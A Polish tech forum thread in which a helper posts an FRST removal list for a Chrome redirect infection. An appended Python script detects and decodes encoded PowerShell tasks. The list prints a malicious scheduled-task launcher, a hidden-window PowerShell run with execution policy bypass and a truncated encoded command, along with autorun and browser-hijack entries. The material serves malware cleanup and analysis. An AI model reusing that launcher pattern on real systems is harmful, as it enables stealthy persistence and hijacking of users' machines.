Elektroda.pl

Strange redirect in Google Chrome

bolek263 06 Mar 2016 14:29 528 1
  • Helpful post
    #2 06 Mar 2016 16:34
    krzychupar
    Level 40  

    The Addition.txt log as well.

    Added after 1 [hour] 55 [minutes]:

    Open the system Notepad and paste:
    Task: {695DB868-7AC8-48B8-9AA2-574AF947E88E} - System32\Tasks\{0B7D0A47-7A79-0E05-0D11-797E0F7E117F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (dane wartości zawierają 9356 znaków więcej).
    Hosts:
    HKU\S-1-5-21-3565814362-3438041228-2249517483-1000\...\MountPoints2: {9f212ad9-a98a-11e5-9ac6-c40229d97301} - H:\autorun.exe
    HKU\S-1-5-21-3565814362-3438041228-2249517483-1000\...\MountPoints2: {e2849463-a99c-11e5-bab2-b0a52bc0da11} - G:\AUTOSTARTER.EXE
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    SearchScopes: HKU\S-1-5-21-3565814362-3438041228-2249517483-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-3565814362-3438041228-2249517483-1000 -> {038CB375-DD3D-4C17-A0A8-4F6E2532DF2B} URL = hxxps://search.yahoo.com/search?fr=chr-greent...mp;ei=utf-8&ilc=12&type=435371&p={searchTerms}
    BHO-x32: Discovery App -> {ba32987d-db80-4ccb-a8bb-f812b5421c0f} -> C:\Program Files (x86)\Discovery App\Extensions\ba32987d-db80-4ccb-a8bb-f812b5421c0f.dll => Brak pliku
    StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.piesearch.com/?type=sc&ts=1451...&uid=cd6ee4b7-4dc5-49b4-893a-3821d0c30225
    U3 ayi8rlt9; C:\Windows\System32\Drivers\ayi8rlt9.sys [0 ] (Microsoft Corporation) <==== UWAGA (zerobajtowy plik/folder)
    S1 wfdrvr_vt_1_10_0_28; system32\drivers\wfdrvr_vt_1_10_0_28.sys [X]
    2016-03-06 12:12 - 2016-03-06 12:13 - 00000000 ____D C:\ProgramData\4039a5ff-47f5-1
    2016-03-06 12:12 - 2016-03-06 12:12 - 00000000 ____D C:\ProgramData\4039a5ff-0b17-0
    2016-03-06 06:12 - 2016-03-06 06:12 - 00000000 ____D C:\ProgramData\4039a5ff-54b1-0
    2016-03-06 06:12 - 2016-03-06 06:12 - 00000000 ____D C:\ProgramData\4039a5ff-3043-1
    2016-03-06 00:12 - 2016-03-06 00:12 - 00000000 ____D C:\ProgramData\4039a5ff-3b05-1
    2016-03-06 00:12 - 2016-03-06 00:12 - 00000000 ____D C:\ProgramData\4039a5ff-19d3-0
    2016-03-05 18:12 - 2016-03-05 18:12 - 00000000 ____D C:\ProgramData\4039a5ff-77f3-1
    2016-03-05 18:12 - 2016-03-05 18:12 - 00000000 ____D C:\ProgramData\4039a5ff-5ce3-0
    2016-03-05 12:12 - 2016-03-05 12:12 - 00000000 ____D C:\ProgramData\4039a5ff-4c25-0
    2016-03-05 12:12 - 2016-03-05 12:12 - 00000000 ____D C:\ProgramData\4039a5ff-1fc5-1
    2016-02-27 18:07 - 2016-03-05 09:48 - 00000000 ____D C:\ProgramData\4039a5ff-5cc1-0
    2016-02-27 18:07 - 2016-03-05 09:48 - 00000000 ____D C:\ProgramData\4039a5ff-3aa5-0
    2016-02-27 18:07 - 2016-02-27 18:07 - 00000000 ____D C:\ProgramData\6e34c50a
    2016-02-27 18:07 - 2016-02-27 18:07 - 00000000 ____D C:\ProgramData\{224eeded-612c-0}
    2016-02-27 18:07 - 2016-02-27 18:07 - 00000000 ____D C:\ProgramData\{00865464-212c-1}
    2016-02-27 18:07 - 2015-12-23 18:57 - 00000000 ____D C:\ProgramData\2fde8768-7da7-0
    2016-02-27 18:07 - 2015-12-23 18:57 - 00000000 ____D C:\ProgramData\2fde8768-69f7-1
    C:\ProgramData\fontcacheev1.dat
    EmptyTemp:

    Save the file as fixlist.txt and place it in the folder C:\Users\xxxx\Downloads\FRST64.exe2016-03-06
    Run FRST and click Fix/Napraw.

    0
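The Task: entry in the fixlist above launches PowerShell with a hidden window and an -EncodedCommand value that the log cuts off. The sketch below is an added example, not part of the original post and not FRST code: it finds such task lines and decodes whatever part of the Base64 (UTF-16LE) script survived. The sample lines, GUIDs and script text are constructed, and the helper names are hypothetical.

```python
import base64
import re

# Shape of the FRST "Task:" line in the fixlist: Task: {GUID} - <task path> => <command>
TASK_RE = re.compile(r"^\s*Task: \{[0-9A-Fa-f-]+\} - (?P<path>.+?) => (?P<cmd>.+)$")

def is_param(token, full, min_len=1):
    """powershell.exe accepts abbreviated parameter names, e.g. -enc or -w."""
    name = token[1:].lower()
    return token.startswith("-") and len(name) >= min_len and full.startswith(name)

def decode_truncated(b64):
    """Decode a (possibly cut-off) -EncodedCommand value: Base64 of UTF-16LE text."""
    b64 = b64.rstrip("=")
    if len(b64) % 4 == 1:                  # a lone trailing character holds no full byte
        b64 = b64[:-1]
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    raw = raw[: len(raw) - len(raw) % 2]   # drop half of a split UTF-16 code unit
    return raw.decode("utf-16-le", errors="replace")

def triage(lines):
    """Return one finding per scheduled task that launches encoded PowerShell."""
    findings = []
    for line in lines:
        m = TASK_RE.match(line)
        if not m or "powershell" not in m["cmd"].lower():
            continue
        tokens = m["cmd"].split()
        flags, decoded = set(), None
        for tok, nxt in zip(tokens, tokens[1:] + [""]):
            if is_param(tok, "encodedcommand") or tok.lower() == "-ec":
                decoded = decode_truncated(re.sub(r"[^A-Za-z0-9+/=]", "", nxt))
            elif is_param(tok, "windowstyle") and nxt.lower() == "hidden":
                flags.add("hidden-window")
            elif is_param(tok, "executionpolicy", 2) and nxt.lower() == "bypass":
                flags.add("policy-bypass")
        if decoded is not None:
            findings.append({"task": m["path"], "flags": flags, "script_start": decoded})
    return findings

# Constructed sample input (not from the log): a harmless script, encoded and cut short.
SAMPLE_SCRIPT = '$ErrorActionPreference="stop";Write-Output "constructed sample"'
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()[:-7]
SAMPLE_LINES = [
    r"Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\{EXAMPLE} => powershell.exe"
    r" -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand " + SAMPLE_B64,
    r"Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\ExampleUpdater => C:\Example\update.exe /c",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES):
        print(finding)
```

Because the log stores only the beginning of the value, the decoded text is just the start of the script; the full command has to be read from the task definition itself before the task is removed.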